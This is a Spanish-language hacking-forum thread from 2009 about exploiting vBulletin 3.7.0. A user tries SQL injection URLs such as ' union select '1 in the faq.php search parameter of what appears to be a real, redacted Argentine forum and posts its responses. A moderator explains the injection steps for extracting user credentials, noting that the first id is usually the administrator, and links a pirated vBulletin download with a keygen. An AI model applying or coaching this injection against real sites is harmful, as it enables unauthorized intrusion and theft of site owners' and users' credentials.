elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Alguna vulnerabilidad en VBulletin?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Alguna vulnerabilidad en VBulletin?  (Leído 5,178 veces)
Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Alguna vulnerabilidad en VBulletin?
« en: 6 Diciembre 2009, 05:50 am »

Hola gente..
Alguien conoce alguna vulnerabilidad en VBulletin 3.7.0?
En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 896


Imagen recursiva


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #1 en: 6 Diciembre 2009, 11:49 am »

http://securityreason.com/securityalert/3907
En línea

Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #2 en: 6 Diciembre 2009, 16:32 pm »

Cuando intento lo que "recomienda  probar".. dice:

Database Error     Database error
The xxxxxxxx database has encountered a problem.
Please try the following:

    * Load the page again by clicking the Refresh button in your web browser.
    * Open the www.xxxxxxxxxx.com.ar home page, then try to open another page.
    * Click the Back button to try another link.

The www.xxxxxxxxxxxxxxx.com.ar forum technical staff have been notified of the error, though you may contact them if the problem persists.
 
We apologise for any inconvenience.
En línea

Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #3 en: 6 Diciembre 2009, 16:56 pm »

Alguien tiene VBulletin 3.7.0 ???

Me tira el codigo fuente del faq.php??
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #4 en: 6 Diciembre 2009, 20:37 pm »

Ese error significa que intentaste hacer una inyección SQL pero quedó mal hecha por lo tanto la query quedó corrupta y te devolvió un error.

Eso significa que si es vulnerable a inyección SQL.

Cuando dicen:
http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sqlinjection]&match=any&titlesonly=1

Significa que donde dice "[Sqlinjection]" debes reemplazarlo por tu inyección SQL, o sea... vas probando con el famoso ' order by 99, despues el union select 12345... etc etc y despues vas sacando los accesos de la columna de usuario donde generalmente el primer id válido de la tabla es el administrador.
En línea

Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #5 en: 6 Diciembre 2009, 21:04 pm »

Con un:
.com.ar/foros/faq.php?s=&do=search&q=' union select '1&match=any&titlesonly=0

me devulve ésto la web:
1||1260129794||190.230.57.174||s=&do=search&q=%27%20union%20select%20%271&match=any&titlesonly=0||||Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)Access Denied, you have been logged.

solamente ese texto...
y con el:
.com.ar/foros/faq.php?s=&do=search&q=' ORDER BY '1&match=any&titlesonly=0
Deja de dar error.. pero la busqueda no devuelve resutaldo..
Tampoco espero que devuelva algo.. si la busqueda se hace en un FAQ! :/


Por eso me gustaria tener todo el codigo de vBulletin 3.7.0 para poder analizarlo... a ver que se puede hacer..
« Última modificación: 6 Diciembre 2009, 21:07 pm por Skeletron » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Alguna vulnerabilidad en VBulletin?
« Respuesta #6 en: 6 Diciembre 2009, 21:12 pm »

Lo que sucede esque
.com.ar/foros/faq.php?s=&do=search&q=' union select '1&match=any&titlesonly=0
está mal porque como sabes si la tabla tiene una sola columna o no, eso debería darte error.

http://www.programaswarez.com/descargar-scripts-gratis/4294-descargar-vbulletin-3-7-0-gold-vbulletin-blog-1-05-keygen-free-download.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
CONSULTA: Vulnerabilidad VBulletin
Hacking
Pabloxxx 9 6,616 Último mensaje 15 Julio 2011, 22:41 pm
por Pabloxxx
Vulnerabilidad Vbulletin 4.1.12 [XSS]
Nivel Web
0x6865726e616e 9 4,517 Último mensaje 13 Mayo 2012, 21:50 pm
por ~ Yoya ~
Consulta ves alguna vulnerabilidad en este script mi favorito.
Nivel Web
Weeken 0 2,178 Último mensaje 4 Abril 2013, 08:30 am
por Weeken
alguna vulnerabilidad sobre HTTAPI httpd 2.0 SSDP/UPnP ??
Bugs y Exploits
jorguko 0 1,967 Último mensaje 29 Mayo 2019, 16:02 pm
por jorguko
[Pregunta]: ¿Acarrea alguna vulnerabilidad? « 1 2 »
Desarrollo Web
Leguim 14 5,433 Último mensaje 20 Diciembre 2019, 14:49 pm
por MinusFour
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines